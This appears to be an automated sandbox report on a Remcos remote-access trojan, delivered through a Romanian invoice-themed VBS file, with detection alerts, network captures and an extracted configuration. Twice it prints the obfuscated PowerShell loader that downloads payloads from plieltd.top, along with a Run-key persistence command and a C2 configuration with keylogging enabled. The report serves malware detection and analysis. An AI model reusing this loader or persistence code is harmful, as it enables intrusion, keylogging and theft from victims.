ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1012, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)", ProcessId: 7432, ProcessName: cmd.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs", ProcessId: 7768, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpH

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 1012, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T14:17:44.971905+020020365941Malware Command and Control Activity Detected192.168.2.449745185.236.203.10151525TCP
                2024-10-21T14:17:47.995395+020020365941Malware Command and Control Activity Detected192.168.2.449746185.236.203.10151525TCP
                2024-10-21T14:17:51.087230+020020365941Malware Command and Control Activity Detected192.168.2.449747185.236.203.10151525TCP
                2024-10-21T14:17:54.067087+020020365941Malware Command and Control Activity Detected192.168.2.449748185.236.203.10151525TCP
                2024-10-21T14:17:57.062288+020020365941Malware Command and Control Activity Detected192.168.2.449750185.236.203.10151525TCP
                2024-10-21T14:17:59.200136+020020365941Malware Command and Control Activity Detected192.168.2.449751185.236.203.10151525TCP
                2024-10-21T14:18:02.562679+020020365941Malware Command and Control Activity Detected192.168.2.449758185.236.203.10151525TCP
                2024-10-21T14:18:05.364964+020020365941Malware Command and Control Activity Detected192.168.2.449769185.236.203.10151525TCP
                2024-10-21T14:18:08.447528+020020365941Malware Command and Control Activity Detected192.168.2.449788185.236.203.10151525TCP
                2024-10-21T14:18:11.941565+020020365941Malware Command and Control Activity Detected192.168.2.449806185.236.203.10151525TCP
                2024-10-21T14:18:15.470639+020020365941Malware Command and Control Activity Detected192.168.2.449823185.236.203.10151525TCP
                2024-10-21T14:18:18.489328+020020365941Malware Command and Control Activity Detected192.168.2.449843185.236.203.10151525TCP
                2024-10-21T14:18:20.996537+020020365941Malware Command and Control Activity Detected192.168.2.449863185.236.203.10151525TCP
                2024-10-21T14:18:24.548551+020020365941Malware Command and Control Activity Detected192.168.2.449874185.236.203.10151525TCP
                2024-10-21T14:18:28.144206+020020365941Malware Command and Control Activity Detected192.168.2.449895185.236.203.10151525TCP
                2024-10-21T14:18:31.950214+020020365941Malware Command and Control Activity Detected192.168.2.449914185.236.203.10151525TCP
                2024-10-21T14:18:34.176307+020020365941Malware Command and Control Activity Detected192.168.2.449933185.236.203.10151525TCP
                2024-10-21T14:18:36.264503+020020365941Malware Command and Control Activity Detected192.168.2.449945185.236.203.10151525TCP
                2024-10-21T14:18:38.555739+020020365941Malware Command and Control Activity Detected192.168.2.449958185.236.203.10151525TCP
                2024-10-21T14:18:40.757396+020020365941Malware Command and Control Activity Detected192.168.2.449971185.236.203.10151525TCP
                2024-10-21T14:18:43.466320+020020365941Malware Command and Control Activity Detected192.168.2.449984185.236.203.10151525TCP
                2024-10-21T14:18:46.400379+020020365941Malware Command and Control Activity Detected192.168.2.449999185.236.203.10151525TCP
                2024-10-21T14:18:49.663580+020020365941Malware Command and Control Activity Detected192.168.2.450011185.236.203.10151525TCP
                2024-10-21T14:18:52.877339+020020365941Malware Command and Control Activity Detected192.168.2.450022185.236.203.10151525TCP
                2024-10-21T14:18:55.536726+020020365941Malware Command and Control Activity Detected192.168.2.450034185.236.203.10151525TCP
                2024-10-21T14:18:58.130787+020020365941Malware Command and Control Activity Detected192.168.2.450036185.236.203.10151525TCP
                2024-10-21T14:19:00.887989+020020365941Malware Command and Control Activity Detected192.168.2.450037185.236.203.10151525TCP
                2024-10-21T14:19:03.667580+020020365941Malware Command and Control Activity Detected192.168.2.450038185.236.203.10151525TCP
                2024-10-21T14:19:06.491923+020020365941Malware Command and Control Activity Detected192.168.2.450039185.236.203.10151525TCP
                2024-10-21T14:19:09.993139+020020365941Malware Command and Control Activity Detected192.168.2.450040185.236.203.10151525TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T14:17:40.495655+020028032702Potentially Bad Traffic192.168.2.449744172.67.155.139443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["pelele.duckdns.org:51525:1"], "Assigned name": "MISS Chy", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TXCR8B", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1012, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.6% probability
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: Binary string: ystem.Core.pdbz source: powershell.exe, 00000005.00000002.1988660063.000000000769A000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49745 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49747 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49748 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49746 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49769 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49863 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49751 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49843 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49806 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49758 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49895 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49788 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49823 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49750 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49874 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49945 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49914 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49971 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49984 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50011 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50039 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49958 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50037 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50036 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50034 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50022 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50040 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50038 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49933 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49999 -> 185.236.203.101:51525
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: pelele.duckdns.org
                Uses dynamic DNS services
                Source: unknownDNS query: name: pelele.duckdns.org
                Uses ping.exe to check the status of other devices and networks
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
                Source: global trafficTCP traffic: 192.168.2.4:49745 -> 185.236.203.101:51525
                Source: Joe Sandbox ViewIP Address: 185.236.203.101 185.236.203.101
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49744 -> 172.67.155.139:443
                Source: global trafficHTTP traffic detected: GET /Tlles187.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /ZPepSmQfDUPElVSkiams84.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Tlles187.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /ZPepSmQfDUPElVSkiams84.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
                Source: global trafficDNS traffic detected: DNS query: plieltd.top
                Source: global trafficDNS traffic detected: DNS query: pelele.duckdns.org
                Source: wscript.exe, 00000000.00000003.1641316528.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1641980389.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1641056271.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640430096.00000221C113E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: wscript.exe, 00000000.00000003.1641316528.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1641980389.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1641056271.00000221C114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1640430096.00000221C113E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: powershell.exe, 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9DA00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://plieltd.top
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9BC81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1970364131.0000000004D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9BC81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
                Source: powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9C81E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9D2C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1753278151.000001CB9BEA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/
                Source: powershell.exe, 00000003.00000002.1753278151.000001CB9BEA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/Tlles187.deployP
                Source: powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/Tlles187.deployXR#l
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2949204687.0000000023470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin8p
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49744 version: TLS 1.2

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1012, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_8168.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVit
